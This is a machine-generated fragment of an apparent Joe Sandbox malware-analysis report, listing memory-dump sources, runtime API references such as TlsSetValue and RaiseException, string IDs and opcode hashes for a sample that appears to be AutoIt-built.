                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 2030045667-4017498283
                                                                            • Opcode ID: 1d16585326ece16a0eda5484eebac71849874b616d0bac460562c406643bb4b8
                                                                            • Instruction ID: 9cef0fa442fe7b9c1923f8446ff3893125e90705d6c8f265123ccfd35419f873
                                                                            • Opcode Fuzzy Hash: 1d16585326ece16a0eda5484eebac71849874b616d0bac460562c406643bb4b8
                                                                            • Instruction Fuzzy Hash: 0BF05520B1834642EB387375B141BF8A611AF883C0FC04430C90C47BCACEBCE4A38320
                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7978575E9
                                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF797857241,?,?,?,?,00007FF79785660C,?,?,?,?,00007FF797854CD3), ref: 00007FF797857600
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Valuetry_get_function
                                                                            • String ID: FlsSetValue
                                                                            • API String ID: 738293619-3750699315
                                                                            • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                            • Instruction ID: 6326395a82f0013a3d57e79296f2c71fea7874afcc57329539a92244e569abfd
                                                                            • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                            • Instruction Fuzzy Hash: 50E065A1A0C542C1EB257B75F800CF8A761AF88BD1FC88435DA0D06255CFBCD966C661
                                                                            APIs
                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF797855629
                                                                            • _CxxThrowException.LIBVCRUNTIME ref: 00007FF79785563A
                                                                              • Part of subcall function 00007FF797857018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79785563F), ref: 00007FF79785708D
                                                                              • Part of subcall function 00007FF797857018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79785563F), ref: 00007FF7978570BF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                            • String ID: Unknown exception
                                                                            • API String ID: 3561508498-410509341
                                                                            • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                            • Instruction ID: afee3118e4c7872c9199db0551e9e55fda44b62c338e1b728deac8f247b0c787
                                                                            • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                            • Instruction Fuzzy Hash: 8ED05E22A18986D1DE30FB24D8807A8E330FB80388FD04431E24D825B1EF2CDA5BD320